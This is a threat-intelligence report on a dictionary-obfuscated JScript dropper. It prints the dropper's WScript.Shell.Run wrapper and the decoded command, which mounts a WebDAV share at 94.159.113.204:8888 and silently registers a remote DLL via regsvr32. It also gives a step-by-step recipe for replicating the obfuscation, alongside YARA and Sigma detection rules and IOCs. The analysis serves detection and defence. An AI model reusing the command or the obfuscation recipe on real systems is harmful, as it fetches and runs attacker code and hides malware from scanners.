2b1c59026010851ed1b303f3db9e2ec71d5f6d19c382db4734c798ca6cc30007unclassified-js-webdav-dropper: 2b1c5902 — 66-entry dictionary-lookup JScript dropper
Executive Summary
JScript dropper using a 66-entry dictionary-lookup obfuscation (random noise keys) and Function('return this')() constructor assembly to build a WScript.Shell.run() chain that launches a PowerShell -EncodedCommand payload. The encoded payload mounts a WebDAV share at \\94.159.113.204@8888\davwwwroot\ and silently registers 376766747973.dll via regsvr32 /s. One-hundred-and-sixth confirmed sibling in the unclassified-js-webdav-dropper family; seventh on C2 IP 94.159.113.204:8888. Static-only analysis (CAPE skipped — JScript is not a supported binary class).
What It Is
| Field | Value |
|---|---|
| SHA-256 | 2b1c59026010851ed1b303f3db9e2ec71d5f6d19c382db4734c798ca6cc30007 |
| Filename | 442929261103923161.js ^[metadata.json] |
| Size | 77,980 bytes ^[exiftool.json] |
| Family | unclassified-js-webdav-dropper |
| File type | ASCII text, single line, no line terminators ^[file.txt] |
| Triage date | 2026-05-26 ^[triage.json] |
How It Works
Obfuscation Engine
The script is a single-line JScript file that uses a 66-entry dictionary lookup table with random lowercase noise keys (e.g. hpewdogmld, nnsqqoxusijxfs, aizdlqzkchjb) mapping to individual characters. ^[strings.txt:1]
Dictionary assignments are appended as trailing semicolon-delimited statements after the function body: varname="X";varname="Y";... Each variable is reassigned multiple times (last-wins semantics), yielding 66 unique character mappings. The dictionary is smaller than the 100-entry variants (e.g. fbdd83ad, f51f6323) and larger than the 52-entry direct-variable map observed in 25b576b7. ^[strings.txt:77940]
Execution Chain
The outer wrapper assembles the payload via nested Function('return this')() constructors: ^[strings.txt:1]
function dbinixagjumay(){
Function('return this')()['eval'](
Function('return this')()['WScript']['CreateObject']('WScript.Shell')
['Run']("powershell -EncodedCommand <base64>", 0, false)
);
}
The 0, false arguments to .Run() hide the window and do not wait for completion. ^[intercept2.js runtime]
Decoded PowerShell Payload
Runtime interception via Node.js (intercept2.js) captured the actual command passed to WScript.Shell.Run:
timeout 1;qbucpguafd;net use \\94.159.113.204@8888\davwwwroot\;ozunnqevmop;
regsvr32 /s \\94.159.113.204@8888\davwwwroot\376766747973.dll;fazixhjlqwkv
Breaking down the payload: ^[intercept2.js runtime + base64 decode]
timeout 1— anti-emulation delay (1-second sleep before payload execution)net use \\94.159.113.204@8888\davwwwroot\— mounts the remote WebDAV shareregsvr32 /s \\94.159.113.204@8888\davwwwroot\376766747973.dll— silently registers the remote DLL (T1218.010)- The noise tokens (
qbucpguafd,ozunnqevmop,fazixhjlqwkv) are no-op padding that would execute as invalid commands in PowerShell; their purpose is anti-static obfuscation within the encoded string.
C2 Infrastructure
| Indicator | Value |
|---|---|
| WebDAV C2 | 94.159.113.204:8888 |
| Payload filename | 376766747973.dll |
| Execution method | regsvr32 /s via PowerShell -EncodedCommand |
This is the seventh confirmed sibling on C2 IP 94.159.113.204:8888, joining fa8c6d74 (65th), ddf0c8bd (80th), edfb0e0a (85th), 771c8752 (90th), 82d78891aa (93rd), and 8ac4b873 (99th). All seven share the same execution engine and subnet but use disjoint dictionary key sets and payload filenames.
Decompiled Behavior
Static-only — no Ghidra/radare2 applicable (JScript text file). The script was decoded via Node.js runtime interception mocking WScript.Shell and eval to capture the payload string without full execution.
C2 Infrastructure
- IP:
94.159.113.204:8888 - Protocol: HTTP WebDAV (
\\host@port\DavWWWRoot\) - Payload:
376766747973.dll - Execution:
regsvr32 /s(T1218.010)
Interesting Tidbits
- Dictionary size 66 — intermediate between the 52-entry minimal variants (
25b576b7) and the 100-entry maximal variants (fbdd83ad,f51f6323). Suggests the builder randomizes entry count. - No batch/polyglot layer — pure JScript, unlike the early
da58243cpolyglot siblings. - No
wordpaddecoy — absent across all94.159.113.xsubnet siblings. - PowerShell
-EncodedCommandwrapper present (not all siblings use this; some callWScript.Shell.run()directly). - Anti-emulation via
timeout 1inside the encoded payload — a lightweight timing gate. - The variable
dbinixagjumay(the function name) and the trailing dictionary assignments consume the majority of the file's character count; the actual functional payload is ~5,700 characters.
How To Mess With It (Homelab Replication)
Toolchain: Node.js (or any JS engine with eval and Function)
Obfuscation recipe:
- Generate a random dictionary of N entries (here, 66) mapping noise strings to single characters.
- Encode your payload string by replacing each character with its corresponding noise key.
- Wrap in
Function('return this')()['eval'](Function('return this')()['WScript']['CreateObject']('WScript.Shell')['Run'](<encoded_cmd>, 0, false)). - Append trailing assignments as
key="char";key="char";...(last assignment wins for each key).
Verification: Mock WScript.Shell in Node.js and intercept .Run() arguments to confirm payload reconstruction.
Deployable Signatures
YARA Rule
rule WEBDAV_JS_Dropper_Dictionary_66Entry {
meta:
description = "JScript WebDAV dropper with dictionary-lookup obfuscation (66-entry variant)"
author = "PacketPursuit"
date = "2026-07-26"
hash = "2b1c59026010851ed1b303f3db9e2ec71d5f6d19c382db4734c798ca6cc30007"
strings:
$func = "function dbinixagjumay(){Function(" ascii
$eval_chain = ")()[" ascii
$wscript = "WScript" ascii
$trailing = "dbinixagjumay();" ascii
$webdav = /\\94\.159\.113\.[0-9]{1,3}@8888\\davwwwroot/i
$regsvr = "regsvr32 /s" ascii
condition:
filesize < 100KB and
$func and $eval_chain and $wscript and $trailing and
($webdav or $regsvr)
}
Behavioral Hunt Query (Sigma)
title: WebDAV DLL Registration via JScript Dropper
status: stable
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'regsvr32 /s \\94.159.113'
- 'rundll32 \\94.159.113'
- 'net use \\94.159.113'
condition: selection
falsepositives:
- Unknown
level: high
IOC List
| Type | Value |
|---|---|
| SHA-256 | 2b1c59026010851ed1b303f3db9e2ec71d5f6d19c382db4734c798ca6cc30007 |
| Filename | 442929261103923161.js |
| C2 IP | 94.159.113.204:8888 |
| Payload | 376766747973.dll |
| WebDAV path | \\94.159.113.204@8888\davwwwroot\ |
Behavioral Fingerprint
This JScript dropper uses a dictionary-lookup obfuscation (66 noise-key entries) assembled via Function('return this')() to build a WScript.Shell.Run() call. The executed command is a PowerShell -EncodedCommand payload that mounts a remote WebDAV share via net use and silently registers a DLL via regsvr32 /s. A timeout 1 anti-emulation delay precedes the payload. No decoy, no batch layer, no sandbox gate.
Detection Signatures
| Tactic | Technique | Evidence |
|---|---|---|
| Execution | T1059.005 (Visual Basic / JScript) | JScript .js file opened by WScript ^[strings.txt] |
| Execution | T1059.001 (PowerShell) | powershell.exe -EncodedCommand wrapper ^[intercept2.js] |
| Execution | T1218.010 (Regsvr32) | regsvr32 /s \\94.159.113.204@8888\davwwwroot\376766747973.dll ^[intercept2.js] |
| Defense Evasion | T1218 (System Binary Proxy Execution) | wscript.exe → powershell.exe → regsvr32 proxy chain ^[intercept2.js] |
| Defense Evasion | T1027 (Obfuscated Files or Information) | 66-entry dictionary lookup obfuscation ^[strings.txt] |
| Command & Control | T1071.001 (Web Protocols) | WebDAV over HTTP (\\host@8888\DavWWWRoot\) ^[intercept2.js] |
| Command & Control | T1105 (Ingress Tool Transfer) | net use mounts WebDAV share; regsvr32 fetches remote DLL ^[intercept2.js] |
References
- Artifact ID:
b865d502-7457-46b3-9450-f9ad26c29752^[metadata.json] - Family entity: unclassified-js-webdav-dropper
- Technique: js-dictionary-char-lookup-obfuscation
- Technique: webdav-regsvr32-dll-sideloading
- Sibling on same C2:
fa8c6d74(65th),ddf0c8bd(80th),edfb0e0a(85th),771c8752(90th),82d78891aa(93rd),8ac4b873(99th)
Provenance
file.txt— file type identification (ASCII text, single line)exiftool.json— metadata (filename, size, MIME type)metadata.json— artifact ID and OpenCTI labelsstrings.txt— raw JScript content, dictionary assignments, obfuscated payloadtriage.json— triage timestamp and tier assignmentdynamic-analysis.md— CAPE skipped (not a supported binary class)capa.txt— capa error (not a supported file format for PE analysis)floss.txt— floss error (invalid CLI argument)- Node.js runtime interception (
intercept2.js) executed on 2026-07-26 to decode the PowerShell payload via mockedWScript.Shellandevalcapture.